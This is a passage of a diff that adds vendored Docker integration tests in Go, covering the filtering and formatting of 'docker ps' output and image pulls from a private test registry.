firstID[:12], check.Commentf("Expected id %s, got %s for exited filter, output: %q", firstID[:12], containerOut, out)) +} + +func (s *DockerSuite) TestPsListContainersFilterName(c *check.C) { + // start container + dockerCmd(c, "run", 
"--name=a_name_to_match", "busybox") + id, err := getIDByName("a_name_to_match") + c.Assert(err, check.IsNil) + + // start another container + runSleepingContainer(c, "--name=b_name_to_match") + + // filter containers by name + out, _ := dockerCmd(c, "ps", "-a", "-q", "--filter=name=a_name_to_match") + containerOut := strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, id[:12], check.Commentf("Expected id %s, got %s for exited filter, output: %q", id[:12], containerOut, out)) +} + +// Test for the ancestor filter for ps. +// There is also the same test but with image:tag@digest in docker_cli_by_digest_test.go +// +// What the test setups : +// - Create 2 image based on busybox using the same repository but different tags +// - Create an image based on the previous image (images_ps_filter_test2) +// - Run containers for each of those image (busybox, images_ps_filter_test1, images_ps_filter_test2) +// - Filter them out :P +func (s *DockerSuite) TestPsListContainersFilterAncestorImage(c *check.C) { + // Build images + imageName1 := "images_ps_filter_test1" + imageID1, err := buildImage(imageName1, + `FROM busybox + LABEL match me 1`, true) + c.Assert(err, checker.IsNil) + + imageName1Tagged := "images_ps_filter_test1:tag" + imageID1Tagged, err := buildImage(imageName1Tagged, + `FROM busybox + LABEL match me 1 tagged`, true) + c.Assert(err, checker.IsNil) + + imageName2 := "images_ps_filter_test2" + imageID2, err := buildImage(imageName2, + fmt.Sprintf(`FROM %s + LABEL match me 2`, imageName1), true) + c.Assert(err, checker.IsNil) + + // start containers + dockerCmd(c, "run", "--name=first", "busybox", "echo", "hello") + firstID, err := getIDByName("first") + c.Assert(err, check.IsNil) + + // start another container + dockerCmd(c, "run", "--name=second", "busybox", "echo", "hello") + secondID, err := getIDByName("second") + c.Assert(err, check.IsNil) + + // start third container + dockerCmd(c, "run", "--name=third", imageName1, "echo", "hello") + thirdID, 
err := getIDByName("third") + c.Assert(err, check.IsNil) + + // start fourth container + dockerCmd(c, "run", "--name=fourth", imageName1Tagged, "echo", "hello") + fourthID, err := getIDByName("fourth") + c.Assert(err, check.IsNil) + + // start fifth container + dockerCmd(c, "run", "--name=fifth", imageName2, "echo", "hello") + fifthID, err := getIDByName("fifth") + c.Assert(err, check.IsNil) + + var filterTestSuite = []struct { + filterName string + expectedIDs []string + }{ + // non existent stuff + {"nonexistent", []string{}}, + {"nonexistent:tag", []string{}}, + // image + {"busybox", []string{firstID, secondID, thirdID, fourthID, fifthID}}, + {imageName1, []string{thirdID, fifthID}}, + {imageName2, []string{fifthID}}, + // image:tag + {fmt.Sprintf("%s:latest", imageName1), []string{thirdID, fifthID}}, + {imageName1Tagged, []string{fourthID}}, + // short-id + {stringid.TruncateID(imageID1), []string{thirdID, fifthID}}, + {stringid.TruncateID(imageID2), []string{fifthID}}, + // full-id + {imageID1, []string{thirdID, fifthID}}, + {imageID1Tagged, []string{fourthID}}, + {imageID2, []string{fifthID}}, + } + + var out string + for _, filter := range filterTestSuite { + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+filter.filterName) + checkPsAncestorFilterOutput(c, out, filter.filterName, filter.expectedIDs) + } + + // Multiple ancestor filter + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageName2, "--filter=ancestor="+imageName1Tagged) + checkPsAncestorFilterOutput(c, out, imageName2+","+imageName1Tagged, []string{fourthID, fifthID}) +} + +func checkPsAncestorFilterOutput(c *check.C, out string, filterName string, expectedIDs []string) { + actualIDs := []string{} + if out != "" { + actualIDs = strings.Split(out[:len(out)-1], "\n") + } + sort.Strings(actualIDs) + sort.Strings(expectedIDs) + + c.Assert(actualIDs, checker.HasLen, len(expectedIDs), check.Commentf("Expected filtered container(s) for %s 
ancestor filter to be %v:%v, got %v:%v", filterName, len(expectedIDs), expectedIDs, len(actualIDs), actualIDs)) + if len(expectedIDs) > 0 { + same := true + for i := range expectedIDs { + if actualIDs[i] != expectedIDs[i] { + c.Logf("%s, %s", actualIDs[i], expectedIDs[i]) + same = false + break + } + } + c.Assert(same, checker.Equals, true, check.Commentf("Expected filtered container(s) for %s ancestor filter to be %v, got %v", filterName, expectedIDs, actualIDs)) + } +} + +func (s *DockerSuite) TestPsListContainersFilterLabel(c *check.C) { + // start container + dockerCmd(c, "run", "--name=first", "-l", "match=me", "-l", "second=tag", "busybox") + firstID, err := getIDByName("first") + c.Assert(err, check.IsNil) + + // start another container + dockerCmd(c, "run", "--name=second", "-l", "match=me too", "busybox") + secondID, err := getIDByName("second") + c.Assert(err, check.IsNil) + + // start third container + dockerCmd(c, "run", "--name=third", "-l", "nomatch=me", "busybox") + thirdID, err := getIDByName("third") + c.Assert(err, check.IsNil) + + // filter containers by exact match + out, _ := dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me") + containerOut := strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, firstID, check.Commentf("Expected id %s, got %s for exited filter, output: %q", firstID, containerOut, out)) + + // filter containers by two labels + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me", "--filter=label=second=tag") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, firstID, check.Commentf("Expected id %s, got %s for exited filter, output: %q", firstID, containerOut, out)) + + // filter containers by two labels, but expect not found because of AND behavior + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match=me", "--filter=label=second=tag-no") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Equals, 
"", check.Commentf("Expected nothing, got %s for exited filter, output: %q", containerOut, out)) + + // filter containers by exact key + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=label=match") + containerOut = strings.TrimSpace(out) + c.Assert(containerOut, checker.Contains, firstID) + c.Assert(containerOut, checker.Contains, secondID) + c.Assert(containerOut, checker.Not(checker.Contains), thirdID) +} + +func (s *DockerSuite) TestPsListContainersFilterExited(c *check.C) { + runSleepingContainer(c, "--name=sleep") + + dockerCmd(c, "run", "--name", "zero1", "busybox", "true") + firstZero, err := getIDByName("zero1") + c.Assert(err, checker.IsNil) + + dockerCmd(c, "run", "--name", "zero2", "busybox", "true") + secondZero, err := getIDByName("zero2") + c.Assert(err, checker.IsNil) + + out, _, err := dockerCmdWithError("run", "--name", "nonzero1", "busybox", "false") + c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err)) + + firstNonZero, err := getIDByName("nonzero1") + c.Assert(err, checker.IsNil) + + out, _, err = dockerCmdWithError("run", "--name", "nonzero2", "busybox", "false") + c.Assert(err, checker.NotNil, check.Commentf("Should fail.", out, err)) + secondNonZero, err := getIDByName("nonzero2") + c.Assert(err, checker.IsNil) + + // filter containers by exited=0 + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=exited=0") + ids := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(ids, checker.HasLen, 2, check.Commentf("Should be 2 zero exited containers got %d: %s", len(ids), out)) + c.Assert(ids[0], checker.Equals, secondZero, check.Commentf("First in list should be %q, got %q", secondZero, ids[0])) + c.Assert(ids[1], checker.Equals, firstZero, check.Commentf("Second in list should be %q, got %q", firstZero, ids[1])) + + out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=exited=1") + ids = strings.Split(strings.TrimSpace(out), "\n") + c.Assert(ids, checker.HasLen, 2, 
check.Commentf("Should be 2 zero exited containers got %d", len(ids))) + c.Assert(ids[0], checker.Equals, secondNonZero, check.Commentf("First in list should be %q, got %q", secondNonZero, ids[0])) + c.Assert(ids[1], checker.Equals, firstNonZero, check.Commentf("Second in list should be %q, got %q", firstNonZero, ids[1])) + +} + +func (s *DockerSuite) TestPsRightTagName(c *check.C) { + // TODO Investigate further why this fails on Windows to Windows CI + testRequires(c, DaemonIsLinux) + tag := "asybox:shmatest" + dockerCmd(c, "tag", "busybox", tag) + + var id1 string + out, _ := runSleepingContainer(c) + id1 = strings.TrimSpace(string(out)) + + var id2 string + out, _ = runSleepingContainerInImage(c, tag) + id2 = strings.TrimSpace(string(out)) + + var imageID string + out = inspectField(c, "busybox", "Id") + imageID = strings.TrimSpace(string(out)) + + var id3 string + out, _ = runSleepingContainerInImage(c, imageID) + id3 = strings.TrimSpace(string(out)) + + out, _ = dockerCmd(c, "ps", "--no-trunc") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + // skip header + lines = lines[1:] + c.Assert(lines, checker.HasLen, 3, check.Commentf("There should be 3 running container, got %d", len(lines))) + for _, line := range lines { + f := strings.Fields(line) + switch f[0] { + case id1: + c.Assert(f[1], checker.Equals, "busybox", check.Commentf("Expected %s tag for id %s, got %s", "busybox", id1, f[1])) + case id2: + c.Assert(f[1], checker.Equals, tag, check.Commentf("Expected %s tag for id %s, got %s", tag, id2, f[1])) + case id3: + c.Assert(f[1], checker.Equals, imageID, check.Commentf("Expected %s imageID for id %s, got %s", tag, id3, f[1])) + default: + c.Fatalf("Unexpected id %s, expected %s and %s and %s", f[0], id1, id2, id3) + } + } +} + +func (s *DockerSuite) TestPsLinkedWithNoTrunc(c *check.C) { + // Problematic on Windows as it doesn't support links as of Jan 2016 + testRequires(c, DaemonIsLinux) + runSleepingContainer(c, "--name=first") + 
runSleepingContainer(c, "--name=second", "--link=first:first") + + out, _ := dockerCmd(c, "ps", "--no-trunc") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + // strip header + lines = lines[1:] + expected := []string{"second", "first,second/first"} + var names []string + for _, l := range lines { + fields := strings.Fields(l) + names = append(names, fields[len(fields)-1]) + } + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array: %v, got: %v", expected, names)) +} + +func (s *DockerSuite) TestPsGroupPortRange(c *check.C) { + // Problematic on Windows as it doesn't support port ranges as of Jan 2016 + testRequires(c, DaemonIsLinux) + portRange := "3850-3900" + dockerCmd(c, "run", "-d", "--name", "porttest", "-p", portRange+":"+portRange, "busybox", "top") + + out, _ := dockerCmd(c, "ps") + + c.Assert(string(out), checker.Contains, portRange, check.Commentf("docker ps output should have had the port range %q: %s", portRange, string(out))) + +} + +func (s *DockerSuite) TestPsWithSize(c *check.C) { + // Problematic on Windows as it doesn't report the size correctly @swernli + testRequires(c, DaemonIsLinux) + dockerCmd(c, "run", "-d", "--name", "sizetest", "busybox", "top") + + out, _ := dockerCmd(c, "ps", "--size") + c.Assert(out, checker.Contains, "virtual", check.Commentf("docker ps with --size should show virtual size of container")) +} + +func (s *DockerSuite) TestPsListContainersFilterCreated(c *check.C) { + // create a container + out, _ := dockerCmd(c, "create", "busybox") + cID := strings.TrimSpace(out) + shortCID := cID[:12] + + // Make sure it DOESN'T show up w/o a '-a' for normal 'ps' + out, _ = dockerCmd(c, "ps", "-q") + c.Assert(out, checker.Not(checker.Contains), shortCID, check.Commentf("Should have not seen '%s' in ps output:\n%s", shortCID, out)) + + // Make sure it DOES show up as 'Created' for 'ps -a' + out, _ = dockerCmd(c, "ps", "-a") + + hits := 0 + for _, line := range strings.Split(out, "\n") { + if 
!strings.Contains(line, shortCID) { + continue + } + hits++ + c.Assert(line, checker.Contains, "Created", check.Commentf("Missing 'Created' on '%s'", line)) + } + + c.Assert(hits, checker.Equals, 1, check.Commentf("Should have seen '%s' in ps -a output once:%d\n%s", shortCID, hits, out)) + + // filter containers by 'create' - note, no -a needed + out, _ = dockerCmd(c, "ps", "-q", "-f", "status=created") + containerOut := strings.TrimSpace(out) + c.Assert(cID, checker.HasPrefix, containerOut) +} + +func (s *DockerSuite) TestPsFormatMultiNames(c *check.C) { + // Problematic on Windows as it doesn't support link as of Jan 2016 + testRequires(c, DaemonIsLinux) + //create 2 containers and link them + dockerCmd(c, "run", "--name=child", "-d", "busybox", "top") + dockerCmd(c, "run", "--name=parent", "--link=child:linkedone", "-d", "busybox", "top") + + //use the new format capabilities to only list the names and --no-trunc to get all names + out, _ := dockerCmd(c, "ps", "--format", "{{.Names}}", "--no-trunc") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + expected := []string{"parent", "child,parent/linkedone"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with non-truncated names: %v, got: %v", expected, names)) + + //now list without turning off truncation and make sure we only get the non-link names + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}}") + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + expected = []string{"parent", "child"} + var truncNames []string + truncNames = append(truncNames, lines...) 
+ c.Assert(expected, checker.DeepEquals, truncNames, check.Commentf("Expected array with truncated names: %v, got: %v", expected, truncNames)) +} + +// Test for GitHub issue #21772 +func (s *DockerSuite) TestPsNamesMultipleTime(c *check.C) { + runSleepingContainer(c, "--name=test1") + runSleepingContainer(c, "--name=test2") + + //use the new format capabilities to list the names twice + out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Names}}") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + expected := []string{"test2 test2", "test1 test1"} + var names []string + names = append(names, lines...) + c.Assert(expected, checker.DeepEquals, names, check.Commentf("Expected array with names displayed twice: %v, got: %v", expected, names)) +} + +func (s *DockerSuite) TestPsFormatHeaders(c *check.C) { + // make sure no-container "docker ps" still prints the header row + out, _ := dockerCmd(c, "ps", "--format", "table {{.ID}}") + c.Assert(out, checker.Equals, "CONTAINER ID\n", check.Commentf(`Expected 'CONTAINER ID\n', got %v`, out)) + + // verify that "docker ps" with a container still prints the header row also + runSleepingContainer(c, "--name=test") + out, _ = dockerCmd(c, "ps", "--format", "table {{.Names}}") + c.Assert(out, checker.Equals, "NAMES\ntest\n", check.Commentf(`Expected 'NAMES\ntest\n', got %v`, out)) +} + +func (s *DockerSuite) TestPsDefaultFormatAndQuiet(c *check.C) { + config := `{ + "psFormat": "default {{ .ID }}" +}` + d, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + defer os.RemoveAll(d) + + err = ioutil.WriteFile(filepath.Join(d, "config.json"), []byte(config), 0644) + c.Assert(err, checker.IsNil) + + out, _ := runSleepingContainer(c, "--name=test") + id := strings.TrimSpace(out) + + out, _ = dockerCmd(c, "--config", d, "ps", "-q") + c.Assert(id, checker.HasPrefix, strings.TrimSpace(out), check.Commentf("Expected to print only the container id, got %v\n", out)) +} + +// Test for GitHub issue 
#12595 +func (s *DockerSuite) TestPsImageIDAfterUpdate(c *check.C) { + // TODO: Investigate why this fails on Windows to Windows CI further. + testRequires(c, DaemonIsLinux) + originalImageName := "busybox:TestPsImageIDAfterUpdate-original" + updatedImageName := "busybox:TestPsImageIDAfterUpdate-updated" + + runCmd := exec.Command(dockerBinary, "tag", "busybox:latest", originalImageName) + out, _, err := runCommandWithOutput(runCmd) + c.Assert(err, checker.IsNil) + + originalImageID, err := getIDByName(originalImageName) + c.Assert(err, checker.IsNil) + + runCmd = exec.Command(dockerBinary, append([]string{"run", "-d", originalImageName}, sleepCommandForDaemonPlatform()...)...) + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.IsNil) + containerID := strings.TrimSpace(out) + + linesOut, err := exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput() + c.Assert(err, checker.IsNil) + + lines := strings.Split(strings.TrimSpace(string(linesOut)), "\n") + // skip header + lines = lines[1:] + c.Assert(len(lines), checker.Equals, 1) + + for _, line := range lines { + f := strings.Fields(line) + c.Assert(f[1], checker.Equals, originalImageName) + } + + runCmd = exec.Command(dockerBinary, "commit", containerID, updatedImageName) + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.IsNil) + + runCmd = exec.Command(dockerBinary, "tag", updatedImageName, originalImageName) + out, _, err = runCommandWithOutput(runCmd) + c.Assert(err, checker.IsNil) + + linesOut, err = exec.Command(dockerBinary, "ps", "--no-trunc").CombinedOutput() + c.Assert(err, checker.IsNil) + + lines = strings.Split(strings.TrimSpace(string(linesOut)), "\n") + // skip header + lines = lines[1:] + c.Assert(len(lines), checker.Equals, 1) + + for _, line := range lines { + f := strings.Fields(line) + c.Assert(f[1], checker.Equals, originalImageID) + } + +} + +func (s *DockerSuite) TestPsNotShowPortsOfStoppedContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + 
dockerCmd(c, "run", "--name=foo", "-d", "-p", "5000:5000", "busybox", "top") + c.Assert(waitRun("foo"), checker.IsNil) + out, _ := dockerCmd(c, "ps") + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + expected := "0.0.0.0:5000->5000/tcp" + fields := strings.Fields(lines[1]) + c.Assert(fields[len(fields)-2], checker.Equals, expected, check.Commentf("Expected: %v, got: %v", expected, fields[len(fields)-2])) + + dockerCmd(c, "kill", "foo") + dockerCmd(c, "wait", "foo") + out, _ = dockerCmd(c, "ps", "-l") + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + fields = strings.Fields(lines[1]) + c.Assert(fields[len(fields)-2], checker.Not(checker.Equals), expected, check.Commentf("Should not got %v", expected)) +} + +func (s *DockerSuite) TestPsShowMounts(c *check.C) { + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + + mp := prefix + slash + "test" + + dockerCmd(c, "volume", "create", "ps-volume-test") + // volume mount containers + runSleepingContainer(c, "--name=volume-test-1", "--volume", "ps-volume-test:"+mp) + c.Assert(waitRun("volume-test-1"), checker.IsNil) + runSleepingContainer(c, "--name=volume-test-2", "--volume", mp) + c.Assert(waitRun("volume-test-2"), checker.IsNil) + // bind mount container + var bindMountSource string + var bindMountDestination string + if DaemonIsWindows.Condition() { + bindMountSource = "c:\\" + bindMountDestination = "c:\\t" + } else { + bindMountSource = "/tmp" + bindMountDestination = "/t" + } + runSleepingContainer(c, "--name=bind-mount-test", "-v", bindMountSource+":"+bindMountDestination) + c.Assert(waitRun("bind-mount-test"), checker.IsNil) + + out, _ := dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}") + + lines := strings.Split(strings.TrimSpace(string(out)), "\n") + c.Assert(lines, checker.HasLen, 3) + + fields := strings.Fields(lines[0]) + c.Assert(fields, checker.HasLen, 2) + c.Assert(fields[0], checker.Equals, "bind-mount-test") + c.Assert(fields[1], checker.Equals, bindMountSource) 
+ + fields = strings.Fields(lines[1]) + c.Assert(fields, checker.HasLen, 2) + + annonymounsVolumeID := fields[1] + + fields = strings.Fields(lines[2]) + c.Assert(fields[1], checker.Equals, "ps-volume-test") + + // filter by volume name + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume=ps-volume-test") + + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + c.Assert(lines, checker.HasLen, 1) + + fields = strings.Fields(lines[0]) + c.Assert(fields[1], checker.Equals, "ps-volume-test") + + // empty results filtering by unknown volume + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume=this-volume-should-not-exist") + c.Assert(strings.TrimSpace(string(out)), checker.HasLen, 0) + + // filter by mount destination + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+mp) + + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + c.Assert(lines, checker.HasLen, 2) + + fields = strings.Fields(lines[0]) + c.Assert(fields[1], checker.Equals, annonymounsVolumeID) + fields = strings.Fields(lines[1]) + c.Assert(fields[1], checker.Equals, "ps-volume-test") + + // filter by bind mount source + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountSource) + + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + c.Assert(lines, checker.HasLen, 1) + + fields = strings.Fields(lines[0]) + c.Assert(fields, checker.HasLen, 2) + c.Assert(fields[0], checker.Equals, "bind-mount-test") + c.Assert(fields[1], checker.Equals, bindMountSource) + + // filter by bind mount destination + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+bindMountDestination) + + lines = strings.Split(strings.TrimSpace(string(out)), "\n") + c.Assert(lines, checker.HasLen, 1) + + fields = strings.Fields(lines[0]) + c.Assert(fields, checker.HasLen, 2) + c.Assert(fields[0], checker.Equals, 
"bind-mount-test") + c.Assert(fields[1], checker.Equals, bindMountSource) + + // empty results filtering by unknown mount point + out, _ = dockerCmd(c, "ps", "--format", "{{.Names}} {{.Mounts}}", "--filter", "volume="+prefix+slash+"this-path-was-never-mounted") + c.Assert(strings.TrimSpace(string(out)), checker.HasLen, 0) +} + +func (s *DockerSuite) TestPsFormatSize(c *check.C) { + testRequires(c, DaemonIsLinux) + runSleepingContainer(c) + + out, _ := dockerCmd(c, "ps", "--format", "table {{.Size}}") + lines := strings.Split(out, "\n") + c.Assert(lines[1], checker.Not(checker.Equals), "0 B", check.Commentf("Should not display a size of 0 B")) + + out, _ = dockerCmd(c, "ps", "--size", "--format", "table {{.Size}}") + lines = strings.Split(out, "\n") + c.Assert(lines[0], checker.Equals, "SIZE", check.Commentf("Should only have one size column")) + + out, _ = dockerCmd(c, "ps", "--size", "--format", "raw") + lines = strings.Split(out, "\n") + c.Assert(lines[8], checker.HasPrefix, "size:", check.Commentf("Size should be appended on a newline")) +} + +func (s *DockerSuite) TestPsListContainersFilterNetwork(c *check.C) { + // TODO default network on Windows is not called "bridge", and creating a + // custom network fails on Windows fails with "Error response from daemon: plugin not found") + testRequires(c, DaemonIsLinux) + + // create some containers + runSleepingContainer(c, "--net=bridge", "--name=onbridgenetwork") + runSleepingContainer(c, "--net=none", "--name=onnonenetwork") + + // Filter docker ps on non existing network + out, _ := dockerCmd(c, "ps", "--filter", "network=doesnotexist") + containerOut := strings.TrimSpace(string(out)) + lines := strings.Split(containerOut, "\n") + + // skip header + lines = lines[1:] + + // ps output should have no containers + c.Assert(lines, checker.HasLen, 0) + + // Filter docker ps on network bridge + out, _ = dockerCmd(c, "ps", "--filter", "network=bridge") + containerOut = strings.TrimSpace(string(out)) + + lines = 
strings.Split(containerOut, "\n") + + // skip header + lines = lines[1:] + + // ps output should have only one container + c.Assert(lines, checker.HasLen, 1) + + // Making sure onbridgenetwork is on the output + c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on network\n")) + + // Filter docker ps on networks bridge and none + out, _ = dockerCmd(c, "ps", "--filter", "network=bridge", "--filter", "network=none") + containerOut = strings.TrimSpace(string(out)) + + lines = strings.Split(containerOut, "\n") + + // skip header + lines = lines[1:] + + //ps output should have both the containers + c.Assert(lines, checker.HasLen, 2) + + // Making sure onbridgenetwork and onnonenetwork is on the output + c.Assert(containerOut, checker.Contains, "onnonenetwork", check.Commentf("Missing the container on none network\n")) + c.Assert(containerOut, checker.Contains, "onbridgenetwork", check.Commentf("Missing the container on bridge network\n")) + + nwID, _ := dockerCmd(c, "network", "inspect", "--format", "{{.ID}}", "bridge") + + // Filter by network ID + out, _ = dockerCmd(c, "ps", "--filter", "network="+nwID) + containerOut = strings.TrimSpace(string(out)) + + c.Assert(containerOut, checker.Contains, "onbridgenetwork") +} + +func (s *DockerSuite) TestPsByOrder(c *check.C) { + name1 := "xyz-abc" + out, err := runSleepingContainer(c, "--name", name1) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + container1 := strings.TrimSpace(out) + + name2 := "xyz-123" + out, err = runSleepingContainer(c, "--name", name2) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + container2 := strings.TrimSpace(out) + + name3 := "789-abc" + out, err = runSleepingContainer(c, "--name", name3) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + name4 := "789-123" + out, err = 
runSleepingContainer(c, "--name", name4) + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // Run multiple time should have the same result + out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz") + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1)) + + // Run multiple time should have the same result + out, err = dockerCmd(c, "ps", "--no-trunc", "-q", "-f", "name=xyz") + c.Assert(err, checker.NotNil) + c.Assert(strings.TrimSpace(out), checker.Equals, fmt.Sprintf("%s\n%s", container2, container1)) +} + +func (s *DockerSuite) TestPsFilterMissingArgErrorCode(c *check.C) { + _, errCode, _ := dockerCmdWithError("ps", "--filter") + c.Assert(errCode, checker.Equals, 125) +} + +// Test case for 30291 +func (s *DockerSuite) TestPsFormatTemplateWithArg(c *check.C) { + runSleepingContainer(c, "-d", "--name", "top", "--label", "some.label=label.foo-bar") + out, _ := dockerCmd(c, "ps", "--format", `{{.Names}} {{.Label "some.label"}}`) + c.Assert(strings.TrimSpace(out), checker.Equals, "top label.foo-bar") +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go new file mode 100644 index 0000000000..cb14c2c702 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_pull_local_test.go @@ -0,0 +1,492 @@ +package main + +import ( + "encoding/json" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "runtime" + "strings" + + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest" + "github.com/docker/distribution/manifest/manifestlist" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +// testPullImageWithAliases pulls a specific image tag and 
verifies that any aliases (i.e., other +// tags for the same image) are not also pulled down. +// +// Ref: docker/docker#8141 +func testPullImageWithAliases(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + + repos := []string{} + for _, tag := range []string{"recent", "fresh"} { + repos = append(repos, fmt.Sprintf("%v:%v", repoName, tag)) + } + + // Tag and push the same image multiple times. + for _, repo := range repos { + dockerCmd(c, "tag", "busybox", repo) + dockerCmd(c, "push", repo) + } + + // Clear local images store. + args := append([]string{"rmi"}, repos...) + dockerCmd(c, args...) + + // Pull a single tag and verify it doesn't bring down all aliases. + dockerCmd(c, "pull", repos[0]) + dockerCmd(c, "inspect", repos[0]) + for _, repo := range repos[1:] { + _, _, err := dockerCmdWithError("inspect", repo) + c.Assert(err, checker.NotNil, check.Commentf("Image %v shouldn't have been pulled down", repo)) + } +} + +func (s *DockerRegistrySuite) TestPullImageWithAliases(c *check.C) { + testPullImageWithAliases(c) +} + +func (s *DockerSchema1RegistrySuite) TestPullImageWithAliases(c *check.C) { + testPullImageWithAliases(c) +} + +// testConcurrentPullWholeRepo pulls the same repo concurrently. +func testConcurrentPullWholeRepo(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + + repos := []string{} + for _, tag := range []string{"recent", "fresh", "todays"} { + repo := fmt.Sprintf("%v:%v", repoName, tag) + _, err := buildImage(repo, fmt.Sprintf(` + FROM busybox + ENTRYPOINT ["/bin/echo"] + ENV FOO foo + ENV BAR bar + CMD echo %s + `, repo), true) + c.Assert(err, checker.IsNil) + dockerCmd(c, "push", repo) + repos = append(repos, repo) + } + + // Clear local images store. + args := append([]string{"rmi"}, repos...) + dockerCmd(c, args...) 
+ + // Run multiple re-pulls concurrently + results := make(chan error) + numPulls := 3 + + for i := 0; i != numPulls; i++ { + go func() { + _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", "-a", repoName)) + results <- err + }() + } + + // These checks are separate from the loop above because the check + // package is not goroutine-safe. + for i := 0; i != numPulls; i++ { + err := <-results + c.Assert(err, checker.IsNil, check.Commentf("concurrent pull failed with error: %v", err)) + } + + // Ensure all tags were pulled successfully + for _, repo := range repos { + dockerCmd(c, "inspect", repo) + out, _ := dockerCmd(c, "run", "--rm", repo) + c.Assert(strings.TrimSpace(out), checker.Equals, "/bin/sh -c echo "+repo) + } +} + +func (s *DockerRegistrySuite) testConcurrentPullWholeRepo(c *check.C) { + testConcurrentPullWholeRepo(c) +} + +func (s *DockerSchema1RegistrySuite) testConcurrentPullWholeRepo(c *check.C) { + testConcurrentPullWholeRepo(c) +} + +// testConcurrentFailingPull tries a concurrent pull that doesn't succeed. +func testConcurrentFailingPull(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL) + + // Run multiple pulls concurrently + results := make(chan error) + numPulls := 3 + + for i := 0; i != numPulls; i++ { + go func() { + _, _, err := runCommandWithOutput(exec.Command(dockerBinary, "pull", repoName+":asdfasdf")) + results <- err + }() + } + + // These checks are separate from the loop above because the check + // package is not goroutine-safe. + for i := 0; i != numPulls; i++ { + err := <-results + c.Assert(err, checker.NotNil, check.Commentf("expected pull to fail")) + } +} + +func (s *DockerRegistrySuite) testConcurrentFailingPull(c *check.C) { + testConcurrentFailingPull(c) +} + +func (s *DockerSchema1RegistrySuite) testConcurrentFailingPull(c *check.C) { + testConcurrentFailingPull(c) +} + +// testConcurrentPullMultipleTags pulls multiple tags from the same repo +// concurrently. 
